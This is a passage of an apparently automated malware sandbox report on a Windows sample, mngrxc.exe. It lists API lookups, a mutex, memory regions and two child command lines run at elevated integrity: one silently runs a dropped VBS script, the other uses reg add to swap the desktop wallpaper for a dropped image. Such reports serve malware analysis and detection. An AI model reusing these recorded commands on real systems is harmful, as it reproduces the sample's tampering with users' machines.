| Get Address | c:\windows\syswow64\ws2_32.dll | function = ioctlsocket, address_out = 0x74d3d860 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAGetLastError, address_out = 0x74d438d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAStartup, address_out = 0x74d42420 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSACleanup, address_out = 0x74d3da00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = accept, address_out = 0x74d44030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = bind, address_out = 0x74d3e0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = connect, address_out = 0x74d433a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getpeername, address_out = 0x74d412c0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockname, address_out = 0x74d3e030 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getsockopt, address_out = 0x74d41180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htonl, address_out = 0x74d43670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = htons, address_out = 0x74d43650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_addr, address_out = 0x74d42e90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = inet_ntoa, address_out = 0x74d44b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = listen, address_out = 0x74d43f40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohl, address_out = 0x74d43670 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = ntohs, address_out = 0x74d43650 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recv, address_out = 0x74d3cff0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = recvfrom, address_out = 0x74d44d60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = select, address_out = 0x74d448e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = send, address_out = 0x74d3ce20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = sendto, address_out = 0x74d415a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = setsockopt, address_out = 0x74d39560 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = shutdown, address_out = 0x74d414e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = socket, address_out = 0x74d39780 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyaddr, address_out = 0x74d5c600 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostbyname, address_out = 0x74d5c790 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobyname, address_out = 0x74d5b6d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getprotobynumber, address_out = 0x74d5b820 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyname, address_out = 0x74d5cad0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getservbyport, address_out = 0x74d5ccb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = gethostname, address_out = 0x74d5c920 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getaddrinfo, address_out = 0x74d352b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = freeaddrinfo, address_out = 0x74d34b00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = getnameinfo, address_out = 0x74d416a0 |
|
1 |
System (143)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
64 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = Ticks, time = 146640 |
|
2 | |
| Get Time | type = Local Time, time = 2019-01-24 01:10:35 (Local Time) |
|
4 | |
| Get Time | type = Ticks, time = 146656 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-24 01:13:13 (Local Time) |
|
64 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Operating System |
|
3 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MutexSPCTDONW |
|
1 | |
| Open | mutex_name = MutexSPCTDONW, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Network Behavior
DNS (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Hostname | name_out = LHnIwsj |
|
1 | |
| Resolve Name | host = LHnIwsj, address_out = 192.168.0.67 |
|
1 |
Process #7: cmd.exe
75
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\iTIcBPF1.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:31, Reason: Child Process |
| Unmonitor | End Time: 00:01:46, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe8c |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E90
0x
FCC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000001f0000 | 0x001f0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00203fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00211fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00213fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00233fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00383fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00390fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000044f0000 | 0x044f0000 | 0x044fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04500000 | 0x045bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x0479ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x0489ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04a40000 | 0x04d76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea00000 | 0x7ea00000 | 0x7eafffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb00000 | 0x7eb00000 | 0x7eb22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb28000 | 0x7eb28000 | 0x7eb2afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb2b000 | 0x7eb2b000 | 0x7eb2bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb2c000 | 0x7eb2c000 | 0x7eb2efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb2f000 | 0x7eb2f000 | 0x7eb2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0x320, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\reg.exe | os_pid = 0x1a4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\reg.exe | os_pid = 0x368, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (35)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
13 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
4 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
3 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 |
Process #8: cmd.exe
57
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\TpKMXrXl.vbs" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:17, Reason: Self Terminated |
| Monitor Duration | 00:00:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3c0 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
628
0x
C60
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000001a0000 | 0x001a0000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00333fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00340fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00351fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x044affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044e0000 | 0x044e0000 | 0x044effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045a0000 | 0x045a0000 | 0x0469ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x046a0000 | 0x0475dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004760000 | 0x04760000 | 0x0485ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04860000 | 0x04b96fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee30000 | 0x7ee30000 | 0x7ef2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef30000 | 0x7ef30000 | 0x7ef52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef57000 | 0x7ef57000 | 0x7ef59fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef5a000 | 0x7ef5a000 | 0x7ef5cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef5d000 | 0x7ef5d000 | 0x7ef5dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef5f000 | 0x7ef5f000 | 0x7ef5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 159, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\wscript.exe | os_pid = 0x318, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #11: wscript.exe
30
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\wscript.exe |
| Command Line | wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\TpKMXrXl.vbs" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:16, Reason: Self Terminated |
| Monitor Duration | 00:00:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x318 |
| Parent PID | 0x3c0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
34C
0x
51C
0x
B74
0x
AD0
0x
9F4
0x
75C
0x
DE0
0x
648
0x
728
0x
454
0x
8B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| wscript.exe | 0x00860000 | 0x00887fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x04b9ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ba0000 | 0x04ba0000 | 0x04bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ba0000 | 0x04ba0000 | 0x04baffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04bb3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bc1fff | Private Memory | rw |
|
|
|
- |
| wscript.exe.mui | 0x04bc0000 | 0x04bc2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004bd0000 | 0x04bd0000 | 0x04be3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d30000 | 0x04d30000 | 0x04d33fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d40000 | 0x04d40000 | 0x04d40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04da0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04db0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004dc0000 | 0x04dc0000 | 0x04dc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04deffff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x04df0000 | 0x04e00fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e50000 | 0x04e50000 | 0x04e50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e60000 | 0x04e60000 | 0x04e60fff | Pagefile Backed Memory | r |
|
|
|
- |
| tpkmxrxl.vbs | 0x04e70000 | 0x04e70fff | Memory Mapped File | r |
|
|
|
|
| private_0x0000000004e70000 | 0x04e70000 | 0x04e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
